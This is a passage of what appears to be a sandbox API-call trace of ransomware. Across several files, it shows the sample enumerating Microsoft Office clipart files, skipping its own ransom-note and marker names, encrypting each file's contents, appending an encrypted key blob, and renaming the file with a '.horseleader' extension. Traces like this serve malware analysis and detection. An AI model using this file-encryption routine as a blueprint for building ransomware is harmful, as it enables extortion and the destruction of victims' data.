lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.408] CloseHandle (hObject=0x158) returned 1 [0253.408] GetProcessHeap () returned 0x780000 [0253.408] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.408] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.horseleader") returned 79 [0253.408] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf.horseleader")) returned 1 [0253.409] GetProcessHeap () returned 0x780000 [0253.409] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.409] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c58200, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x83c58200, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x6a0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00148_.WMF", cAlternateFileName="")) returned 1 [0253.409] lstrcmpiW (lpString1="BL00148_.WMF", lpString2="Windows") returned -1 [0253.409] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 67 [0253.409] StrStrIW (lpFirst="BL00148_.WMF", lpSrch=".horseleader") returned 0x0 [0253.409] lstrcmpW (lpString1="BL00148_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.409] lstrcmpW (lpString1="BL00148_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.409] lstrlenW (lpString=".testttjffg") returned 11 [0253.409] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.409] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.410] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.410] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.410] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 67 [0253.410] StrStrW (lpFirst="BL00148_.WMF", lpSrch=".txt") returned 0x0 [0253.410] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1696) returned 1 [0253.410] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x6a0, lpOverlapped=0x0) returned 1 [0253.412] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff960, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.412] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x6a0, lpOverlapped=0x0) returned 1 [0253.412] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.412] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.413] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.413] CloseHandle (hObject=0x158) returned 1 [0253.413] GetProcessHeap () returned 0x780000 [0253.413] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.413] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.horseleader") returned 79 [0253.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf.horseleader")) returned 1 [0253.414] GetProcessHeap () returned 0x780000 [0253.414] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.414] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82945500, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x82945500, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x5ec, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00152_.WMF", cAlternateFileName="")) returned 1 [0253.414] lstrcmpiW (lpString1="BL00152_.WMF", lpString2="Windows") returned -1 [0253.414] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 67 [0253.414] StrStrIW (lpFirst="BL00152_.WMF", lpSrch=".horseleader") returned 0x0 [0253.414] lstrcmpW (lpString1="BL00152_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.414] lstrcmpW (lpString1="BL00152_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.414] lstrlenW (lpString=".testttjffg") returned 11 [0253.414] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.414] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.414] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.414] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.415] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 67 [0253.415] StrStrW (lpFirst="BL00152_.WMF", lpSrch=".txt") returned 0x0 [0253.415] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1516) returned 1 [0253.415] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5ec, lpOverlapped=0x0) returned 1 [0253.417] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.417] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5ec, lpOverlapped=0x0) returned 1 [0253.417] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.417] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.417] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.417] CloseHandle (hObject=0x158) returned 1 [0253.417] GetProcessHeap () returned 0x780000 [0253.417] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.417] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.horseleader") returned 79 [0253.418] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf.horseleader")) returned 1 [0253.418] GetProcessHeap () returned 0x780000 [0253.418] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.418] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a72500, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x95a72500, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0xf92, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00194_.WMF", cAlternateFileName="")) returned 1 [0253.418] lstrcmpiW (lpString1="BL00194_.WMF", lpString2="Windows") returned -1 [0253.418] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 67 [0253.419] StrStrIW (lpFirst="BL00194_.WMF", lpSrch=".horseleader") returned 0x0 [0253.419] lstrcmpW (lpString1="BL00194_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.419] lstrcmpW (lpString1="BL00194_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.419] lstrlenW (lpString=".testttjffg") returned 11 [0253.419] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.419] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.419] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.419] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.419] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 67 [0253.419] StrStrW (lpFirst="BL00194_.WMF", lpSrch=".txt") returned 0x0 [0253.419] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3986) returned 1 [0253.419] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xf92, lpOverlapped=0x0) returned 1 [0253.421] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff06e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.421] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xf92, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xf92, lpOverlapped=0x0) returned 1 [0253.421] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.421] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.422] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.422] CloseHandle (hObject=0x158) returned 1 [0253.422] GetProcessHeap () returned 0x780000 [0253.422] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.422] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF.horseleader") returned 79 [0253.422] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf.horseleader")) returned 1 [0253.423] GetProcessHeap () returned 0x780000 [0253.423] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.423] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81632800, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81632800, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x1f86, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00195_.WMF", cAlternateFileName="")) returned 1 [0253.423] lstrcmpiW (lpString1="BL00195_.WMF", lpString2="Windows") returned -1 [0253.423] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 67 [0253.423] StrStrIW (lpFirst="BL00195_.WMF", lpSrch=".horseleader") returned 0x0 [0253.423] lstrcmpW (lpString1="BL00195_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.423] lstrcmpW (lpString1="BL00195_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.423] lstrlenW (lpString=".testttjffg") returned 11 [0253.423] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.423] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.423] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.423] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.424] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 67 [0253.424] StrStrW (lpFirst="BL00195_.WMF", lpSrch=".txt") returned 0x0 [0253.424] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8070) returned 1 [0253.425] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1f86, lpOverlapped=0x0) returned 1 [0253.426] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe07a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.426] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1f86, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1f86, lpOverlapped=0x0) returned 1 [0253.427] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.427] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.427] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.427] CloseHandle (hObject=0x158) returned 1 [0253.427] GetProcessHeap () returned 0x780000 [0253.427] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.427] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.horseleader") returned 79 [0253.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00195_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00195_.wmf.horseleader")) returned 1 [0253.428] GetProcessHeap () returned 0x780000 [0253.428] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.428] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81891500, ftCreationTime.dwHighDateTime=0x1bd4b30, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81891500, ftLastWriteTime.dwHighDateTime=0x1bd4b30, nFileSizeHigh=0x0, nFileSizeLow=0x2458, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00234_.WMF", cAlternateFileName="")) returned 1 [0253.428] lstrcmpiW (lpString1="BL00234_.WMF", lpString2="Windows") returned -1 [0253.428] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 67 [0253.428] StrStrIW (lpFirst="BL00234_.WMF", lpSrch=".horseleader") returned 0x0 [0253.428] lstrcmpW (lpString1="BL00234_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.428] lstrcmpW (lpString1="BL00234_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.428] lstrlenW (lpString=".testttjffg") returned 11 [0253.428] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.428] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.428] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.428] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.429] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 67 [0253.429] StrStrW (lpFirst="BL00234_.WMF", lpSrch=".txt") returned 0x0 [0253.429] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9304) returned 1 [0253.429] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2458, lpOverlapped=0x0) returned 1 [0253.431] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdba8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.431] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2458, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2458, lpOverlapped=0x0) returned 1 [0253.431] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.431] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.431] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.431] CloseHandle (hObject=0x158) returned 1 [0253.432] GetProcessHeap () returned 0x780000 [0253.432] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.432] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.horseleader") returned 79 [0253.432] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00234_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00234_.wmf.horseleader")) returned 1 [0253.436] GetProcessHeap () returned 0x780000 [0253.436] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.436] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9438d00, ftCreationTime.dwHighDateTime=0x1bd4b2f, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb9438d00, ftLastWriteTime.dwHighDateTime=0x1bd4b2f, nFileSizeHigh=0x0, nFileSizeLow=0xfb8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00242_.WMF", cAlternateFileName="")) returned 1 [0253.436] lstrcmpiW (lpString1="BL00242_.WMF", lpString2="Windows") returned -1 [0253.436] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 67 [0253.436] StrStrIW (lpFirst="BL00242_.WMF", lpSrch=".horseleader") returned 0x0 [0253.436] lstrcmpW (lpString1="BL00242_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.436] lstrcmpW (lpString1="BL00242_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.436] lstrlenW (lpString=".testttjffg") returned 11 [0253.436] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00242_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.436] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.436] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, 